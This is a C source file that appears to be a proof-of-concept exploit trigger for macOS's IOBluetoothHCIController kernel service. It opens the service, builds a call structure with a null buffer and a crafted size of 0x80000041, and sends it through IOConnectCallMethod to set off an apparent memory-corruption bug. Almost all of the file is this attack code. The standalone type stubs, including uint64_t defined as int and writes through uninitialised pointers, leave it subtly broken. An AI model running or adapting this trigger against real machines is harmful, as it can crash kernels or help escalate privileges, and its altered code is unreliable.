
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int uint64_t ;
typedef int uint32_t ;
struct BluetoothCall {int* args; int* sizes; int index; } ;
typedef int mach_port_t ;
typedef int kern_return_t ;
typedef int io_service_t ;
typedef int io_connect_t ;


 int IOConnectCallMethod (int ,int ,int *,int ,void const*,int,int *,int *,int *,int *) ;
 int IOObjectRelease (int ) ;
 int IOServiceClose (int) ;
 int IOServiceGetMatchingService (int ,int ) ;
 int IOServiceMatching (char*) ;
 int IOServiceOpen (int ,int ,int ,int*) ;
 int SIZE ;
 scalar_t__ calloc (int,int) ;
 int kIOMasterPortDefault ;
 int kIOReturnSuccess ;
 int mach_task_self () ;
 int printf (char*,...) ;

int main(void) {

  io_service_t service =
    IOServiceGetMatchingService(kIOMasterPortDefault,
    IOServiceMatching("IOBluetoothHCIController"));

  if (!service) {
    return -1;
  }


  io_connect_t port = (io_connect_t) 0;
  kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
  IOObjectRelease(service);
  if (kr != kIOReturnSuccess) {
    return kr;
  }

  printf(" [+] Opened connection to service on port: %d\n", port);

  struct BluetoothCall a;
  int i;

  for (i=0; i<7; i++) {
    a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
    a.sizes[i] = SIZE;
  }


  a.args[6] = 0x0;
  a.sizes[6] = 0x80000041;
  a.index = 0x06;

  for(i = 0; i < 120; i++) {
    if(i % 8 == 0) printf("\n");
    printf("\\x%02x", ((unsigned char *)&a)[i]);
  }
  printf("\n");

  kr = IOConnectCallMethod((mach_port_t) port,
      (uint32_t) 0,
      ((void*)0), 0,
      (const void*) &a,
      120,
      ((void*)0), ((void*)0), ((void*)0), ((void*)0));
  printf("kr: %08x\n", kr);

  return IOServiceClose(port);
}
